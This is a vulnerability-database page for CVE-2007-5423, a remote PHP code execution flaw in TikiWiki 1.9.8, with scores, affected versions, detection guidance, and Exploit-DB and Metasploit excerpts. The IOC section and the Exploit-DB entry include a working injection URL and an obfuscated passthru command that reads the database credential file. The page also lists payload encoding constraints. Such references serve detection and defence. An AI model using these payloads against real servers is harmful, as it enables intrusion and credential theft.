CVE-2007-5423
published 2007-10-12CVE-2007-5423: tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by…
PriorityP268high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
76.66%
99.5th percentile
tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by create_function.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tiki | tikiwiki_cms_groupware | <= 1.9.8 | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
| tiki | tikiwiki_cms_groupware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=↗
commandpassthru(chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89).chr(59).chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112).chr(59).chr(101).chr(99).chr(104).chr(111).chr(32).chr(89).chr(89).chr(89))↗
- →Monitor HTTP GET requests targeting tiki-graph_formula.php with an 'f[]' array parameter containing PHP function calls or code sequences (e.g., f[]=x.tan.phpinfo()), which are passed unsanitized to create_function(). ↗
- →Alert on HTTP requests to tiki-graph_formula.php where the f[] parameter contains dot-concatenated PHP function names (e.g., x.tan.phpinfo()), a pattern characteristic of this exploit's injection syntax. ↗
- →Detect exploitation attempts using the Metasploit module's characteristic User-Agent string 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' combined with requests to tiki-graph_formula.php. ↗
- →Flag requests to tiki-graph_formula.php with query parameters t=pdf or t=png alongside f[] array values, as these are required parameters in the exploit's build_uri() construction. ↗
- →Monitor for post-exploitation file reads of db/local.php via passthru() or similar PHP execution functions, which the Metasploit module uses to harvest TikiWiki database credentials. ↗
- →The vulnerable script does not sanitize user input supplied to create_function(); detect any f[] parameter value containing parentheses, PHP built-in function names, or chr() sequences in requests to tiki-graph_formula.php. ↗
- ·The Metasploit payload space is constrained to 6144 bytes due to Apache's maximum URI length of 8190 bytes; payloads delivered via GET URI are limited accordingly. ↗
- ·The character 'x' is a bad character for payloads because the vulnerable code replaces it with '$x'; encoders must avoid 'x' as well as backtick, double-quote, single-quote, space, percent, and ampersand. ↗
- ·The exploit targets TikiWiki versions 1.9.x up to and including 1.9.8; version checks confirm safety for versions beyond 1.9.8. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xh3f-gcw3-fwjc: Incomplete blacklist vulnerability in tiki-graph_formula
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-5682 [HIGH] GHSA-xh3f-gcw3-fwjc: Incomplete blacklist vulnerability in tiki-graph_formula
Incomplete blacklist vulnerability in tiki-graph_formula.php in TikiWiki before 1.9.8.2 allows remote attackers to execute arbitrary code by using variable functions and variable variables to write variables whose names match the whitelist, a different vulnerability than CVE-2007-5423.
GHSA
GHSA-gg68-5jj6-x44x: tiki-graph_formula
ghsa_unreviewed·2022-05-01
CVE-2007-5423 [HIGH] CWE-94 GHSA-gg68-5jj6-x44x: tiki-graph_formula
tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by create_function.
No detection rules found.
Exploit-DB
TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)
exploitdb·2010-09-20
CVE-2007-5423 TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)
TikiWiki tiki-graph_formula - PHP Remote Code Execution (Metasploit)
---
##
# $Id: tikiwiki_graph_formula_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TikiWiki tiki-graph_formula Remote PHP Code Execution',
'Description' => %q{
TikiWiki ( [ 'Matteo Cantoni ', 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2007-5423'],
['OSVDB', '40478'],
['BID', '26006'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
# 6k. Really it's the max
Exploit-DB
TikiWiki 1.9.8 - Remote PHP Injection
exploitdb·2007-10-10
CVE-2007-5423 TikiWiki 1.9.8 - Remote PHP Injection
TikiWiki 1.9.8 - Remote PHP Injection
---
TikiWiki 1.9.8 Remote PHP Injection Vulnerability
Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
# milw0rm.com [2007-10-10]
Metasploit
TikiWiki tiki-graph_formula Remote PHP Code Execution
metasploit
TikiWiki tiki-graph_formula Remote PHP Code Execution
TikiWiki tiki-graph_formula Remote PHP Code Execution
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.
No writeups or analysis indexed.
http://bugs.gentoo.org/show_bug.cgi?id=195503http://osvdb.org/40478http://secunia.com/advisories/27190http://secunia.com/advisories/27344http://securityreason.com/securityalert/3216http://securityvulns.ru/Sdocument162.htmlhttp://sourceforge.net/forum/forum.php?forum_id=744898http://sourceforge.net/project/shownotes.php?release_id=546283&group_id=64258http://www.gentoo.org/security/en/glsa/glsa-200710-21.xmlhttp://www.securityfocus.com/archive/1/482006/100/0/threadedhttp://www.securityfocus.com/archive/1/482128/100/0/threadedhttp://www.securityfocus.com/bid/26006http://www.vupen.com/english/advisories/2007/3492https://exchange.xforce.ibmcloud.com/vulnerabilities/37076https://www.exploit-db.com/exploits/4509http://bugs.gentoo.org/show_bug.cgi?id=195503http://osvdb.org/40478http://secunia.com/advisories/27190http://secunia.com/advisories/27344http://securityreason.com/securityalert/3216http://securityvulns.ru/Sdocument162.htmlhttp://sourceforge.net/forum/forum.php?forum_id=744898http://sourceforge.net/project/shownotes.php?release_id=546283&group_id=64258http://www.gentoo.org/security/en/glsa/glsa-200710-21.xmlhttp://www.securityfocus.com/archive/1/482006/100/0/threadedhttp://www.securityfocus.com/archive/1/482128/100/0/threadedhttp://www.securityfocus.com/bid/26006http://www.vupen.com/english/advisories/2007/3492https://exchange.xforce.ibmcloud.com/vulnerabilities/37076https://www.exploit-db.com/exploits/4509
2007-10-12
Published